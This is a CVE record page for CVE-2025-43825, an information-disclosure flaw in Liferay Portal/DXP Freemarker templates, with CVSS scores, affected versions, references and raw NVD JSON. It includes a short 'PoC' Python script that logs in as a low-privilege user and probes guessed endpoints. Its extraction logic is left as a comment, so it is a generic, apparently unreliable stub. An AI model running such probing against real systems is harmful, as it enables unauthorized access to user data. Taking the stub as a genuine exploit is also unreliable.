CVE-2025-43825

Description

A vulnerability in Liferay Portal 7.4.0 through 7.4.3.132, and Liferay DXP 2025.Q1.0 through 2025.Q1.4, 2024.Q4.0 through 2024.Q4.5, 2024.Q3.0 through 2024.Q3.13, 2024.Q2.1 through 2024.Q2.13, 2024.Q1.1 through 2024.Q1.12, 2023.Q4.0 through 2023.Q4.10, 2023.Q3.1 through 2023.Q3.10, and 7.4 GA through update 92 allows sensitive user data to be included in the Freemarker template. This weakness permits an unauthorized actor to gain access to, and potentially render, confidential information that should remain restricted.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:liferay:digital_experience_platform:*:*:*:*:*:*:*:* - VULNERABLE

Liferay Portal 7.4.0 - 7.4.3.132

Liferay Portal 7.4 GA - update 92

Liferay DXP 2025.Q1.0 - 2025.Q1.4

Liferay DXP 2024.Q4.0 - 2024.Q4.5

Liferay DXP 2024.Q3.0 - 2024.Q3.13

Liferay DXP 2024.Q2.1 - 2024.Q2.13

Liferay DXP 2024.Q1.1 - 2024.Q1.12

Liferay DXP 2023.Q4.0 - 2023.Q4.10

Liferay DXP 2023.Q3.1 - 2023.Q3.10

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-43825 PoC - Liferay Portal/DXP Freemarker Template Information Disclosure
# This vulnerability allows low-privileged users to access sensitive data
# through improperly configured Freemarker templates.

import requests

# Target Liferay Portal/DXP instance
TARGET_URL = "https://target-liferay-instance.com"

# Step 1: Authenticate with low-privileged credentials
session = requests.Session()
login_data = {
    "_com_liferay_login_web_portlet_LoginPortlet_formDate": "",
    "_com_liferay_login_web_portlet_LoginPortlet_saveLastPath": "false",
    "_com_liferay_login_web_portlet_LoginPortlet_redirect": "",
    "_com_liferay_login_web_portlet_LoginPortlet_doActionAfterLogin": "false",
    "_com_liferay_login_web_portlet_LoginPortlet_login": "low_priv_user",
    "_com_liferay_login_web_portlet_LoginPortlet_password": "password123"
}

# Perform login
response = session.post(
    f"{TARGET_URL}/c/portal/login",
    data=login_data,
    allow_redirects=True
)

# Step 2: Access the vulnerable template endpoint
# The vulnerable Freemarker template exposes sensitive user data
vulnerable_endpoints = [
    "/web/guest/home",
    "/group/control_panel/manage",
    "/c/portal/layout",
]

for endpoint in vulnerable_endpoints:
    resp = session.get(f"{TARGET_URL}{endpoint}")
    # Step 3: Extract sensitive information from response
    if "sensitive_data" in resp.text or "userCredentials" in resp.text:
        print(f"[+] Sensitive data found at: {endpoint}")
        # Parse and extract confidential information
        # ... extraction logic here

# Note: The exact endpoint depends on the specific vulnerable template
# configuration in the target Liferay instance.

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-43825
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-43825
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-43825/
[4] VulDB https://vuldb.com/cve/CVE-2025-43825
[5] https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/CVE-2025-43825

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-43825", "sourceIdentifier": "[email protected]", "published": "2025-10-03T22:15:30.910", "lastModified": "2025-12-15T18:22:05.093", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability in Liferay Portal 7.4.0 through 7.4.3.132, and Liferay DXP 2025.Q1.0 through 2025.Q1.4, 2024.Q4.0 through 2024.Q4.5, 2024.Q3.0 through 2024.Q3.13, 2024.Q2.1 through 2024.Q2.13, 2024.Q1.1 through 2024.Q1.12, 2023.Q4.0 through 2023.Q4.10, 2023.Q3.1 through 2023.Q3.10, and 7.4 GA through update 92 allows sensitive user data to be included in the Freemarker template. This weakness permits an unauthorized actor to gain access to, and potentially render, confidential information that should remain restricted."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 4.6, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-201"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:*:*:*:*:*:*:*:*", "versionStartIncluding": "2023.Q3.1", "versionEndIncluding": "2023.Q3.10", "matchCriteriaId": "DB698493-4763-4E87-9764-BC36906CCF5C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:*:*:*:*:*:*:*:*", "versionStartIncluding": "2023.q4.0", "versionEndIncluding": "2023.q4.10", "matchCriteriaId": "99FC3415-FBE2-43BC-944A-72C0885453D1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:*:*:*:*:*:*:*:*", "versionStartIncluding": "2024.Q1.1", "versionEndExcluding": "2024.Q1.13", "matchCriteriaId": "590D94D5-7486-4D96-97F0-C40F58304CF2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:*:*:*:*:*:*:*:*", "versionStartIncluding": "2024.Q2.1", "versionEndIncluding": "2024.Q2.13", "matchCriteriaId": "6D947DFA-C2BB-4B5C-93CF-505525176039"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:*:*:*:*:*:*:*:*", "versionStartIncluding": "2024.Q3.0", "versionEndIncluding": "2024.Q3.13", "matchCriteriaId": "95ED07C5-CA08-40D5-945B-564760714E4C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:*:*:*:*:*:*:*:*", "versionStartIncluding": "2024.Q4.0", "versionEndExcluding": "2024.Q4.6", "matchCriteriaId": "8E1CBC6D-F65C-4A7F-9BF3-4EBF5D505BDB"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:*:*:*:*:*:*:*:*", "versionStartIncluding": "2025.Q1.1", "versionEndExcluding": "2025.Q1.4", "matchCriteriaId": "00A2AB3E-5C95-4FD6-A046-C6E3CC7B0BF4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:7.4:*:*:*:*:*:*:*", "matchCriteriaId": "8E19E344-92B4-4B46-BD89-25EC7191972C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:liferay_portal:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.4.0", "versionEndIncluding": "7.4.3.132", "matchCriteriaId": "8FA15ADB-E7D6-4F24-9A06 ... (truncated)